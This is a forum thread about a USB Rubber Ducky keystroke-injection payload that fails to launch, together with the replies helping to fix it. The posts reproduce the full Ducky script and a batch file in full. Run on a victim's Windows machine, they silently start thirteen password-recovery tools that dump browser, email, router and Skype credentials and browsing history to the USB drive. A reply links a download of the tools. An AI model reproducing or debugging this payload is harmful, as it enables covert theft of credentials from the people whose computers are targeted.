Jump to content

Payload not working

Hakintosh

By Hakintosh
in Classic USB Rubber Ducky

 Share

Recommended Posts

Hakintosh Newbie

Hakintosh

Posted
Posted

Hello everyone,

im trying to understand why this payload doesn't work.

------------

DEFAULT_DELAY 25
REM File: MrGraysRubberHacks.txt
REM Target: WINDOWS VISTA/7
DELAY 1000
ESCAPE
CONTROL ESCAPE
DELAY 100
STRING cmd
DELAY 100
ENTER
DELAY 150
STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)
ENTER
STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
ENTER
STRING %DUCKYdrive%\launch.bat
ENTER

LAUNCH.BAT file:

for /f "tokens=3 delims= " %%A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%%A:)

REM Output everything to this folder so I don't have everything on the duck's root.
set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks

start %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txt
start %DUCKYdrive%\SkypeLogView.exe /stext %DUCKYdrive%\SkypeLogView.txt
start %DUCKYdrive%\RouterPassView.exe /stext %DUCKYdrive%\RouterPassView.txt
start %DUCKYdrive%\pspv.exe /stext %DUCKYdrive%\pspv.txt
start %DUCKYdrive%\PasswordFox.exe /stext %DUCKYdrive%\PasswordFox.txt
start %DUCKYdrive%\OperaPassView.exe /stext %DUCKYdrive%\OperaPassView.txt
start %DUCKYdrive%\mspass.exe /stext %DUCKYdrive%\mspass.txt
start %DUCKYdrive%\mailpv.exe /stext %DUCKYdrive%\mailpv.txt
start %DUCKYdrive%\iepv.exe /stext %DUCKYdrive%\iepv.txt
start %DUCKYdrive%\ChromePass.exe /stext %DUCKYdrive%\ChromePass.txt
start %DUCKYdrive%\ChromeHistoryView.exe /stext %DUCKYdrive%\ChromeHistoryView.txt
start %DUCKYdrive%\BulletsPassView.exe /stext %DUCKYdrive%\BulletsPassView.txt
start %DUCKYdrive%\BrowsingHistoryView.exe /stext %DUCKYdrive%\BrowsingHistoryView.txt

Every time it says: "The system can not find the specified path", when it tries to start the batchfile.

STRING for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^| findstr "DUCKY"') do (set DUCKYdrive=%A:)
ENTER
STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
ENTER
STRING %DUCKYdrive%\launch.bat
ENTER

Hope you guys can help me because it is making me going stupid. :D

Thank you!

((P.S Excuse my english, im from germany))

Link to comment
Share on other sites
mreidiv Newbie

mreidiv

Posted
Posted (edited)

do you have a drive labled ducky plugged in with a folder that says MrGraysRubberHacks

that is what it is asking for here

STRING set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks

pluss you need to put the excicutabled on the drive labled DUCKY in the paths shown here

start %DUCKYdrive%\WebBrowserPassView.exe /stext %DUCKYdrive%\WebBrowserPassView.txt
start %DUCKYdrive%\SkypeLogView.exe /stext %DUCKYdrive%\SkypeLogView.txt
start %DUCKYdrive%\RouterPassView.exe /stext %DUCKYdrive%\RouterPassView.txt
start %DUCKYdrive%\pspv.exe /stext %DUCKYdrive%\pspv.txt
start %DUCKYdrive%\PasswordFox.exe /stext %DUCKYdrive%\PasswordFox.txt
start %DUCKYdrive%\OperaPassView.exe /stext %DUCKYdrive%\OperaPassView.txt
start %DUCKYdrive%\mspass.exe /stext %DUCKYdrive%\mspass.txt
start %DUCKYdrive%\mailpv.exe /stext %DUCKYdrive%\mailpv.txt
start %DUCKYdrive%\iepv.exe /stext %DUCKYdrive%\iepv.txt
start %DUCKYdrive%\ChromePass.exe /stext %DUCKYdrive%\ChromePass.txt
start %DUCKYdrive%\ChromeHistoryView.exe /stext %DUCKYdrive%\ChromeHistoryView.txt
start %DUCKYdrive%\BulletsPassView.exe /stext %DUCKYdrive%\BulletsPassView.txt
start %DUCKYdrive%\BrowsingHistoryView.exe /stext %DUCKYdrive%\BrowsingHistoryView.txt

you can download them here

http://www.mediafire.com/download/nm1c62qt9w9z3wg/MrGraysRubberHacks.rar

Edited by mreidiv
Link to comment
Share on other sites
Hakintosh Newbie

Hakintosh

Posted
  • Author
Posted

First at all, thank you for your help.

I got 3 things on my ducky.

1. The Launch.bat 2. A folder with the exe tools and another copy of the Launch.bat and 3. the inject.bin

The ducky opens the cmd and starts writing.

This appears in the cmd:

Microsoft Windows [Version 6.1.7601]

Copyright © 2009 Microsoft Corporation. Alle Rechte vorbehalten.
C:\Users\*****>for /f "tokens=3 delims= " %A in ('echo list volume ^| diskpart ^
| findstr "DUCKY"') do (set DUCKYdrive=%A:)
C:\Users\*****>set DUCKYdrive=%DUCKYdrive%\MrGraysRubberHacks
C:\Users\*****>%DUCKYdrive%\launch.bat
The system can not find the specified path.
C:\Users\*****>

It cant find the launch.bat!?

Link to comment
Share on other sites
mreidiv Newbie

mreidiv

Posted
Posted

it happens to all of us. I believe it is possiable but not feisable because of the slow read / write times with the duck and it also depends on the firmware that you are using.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...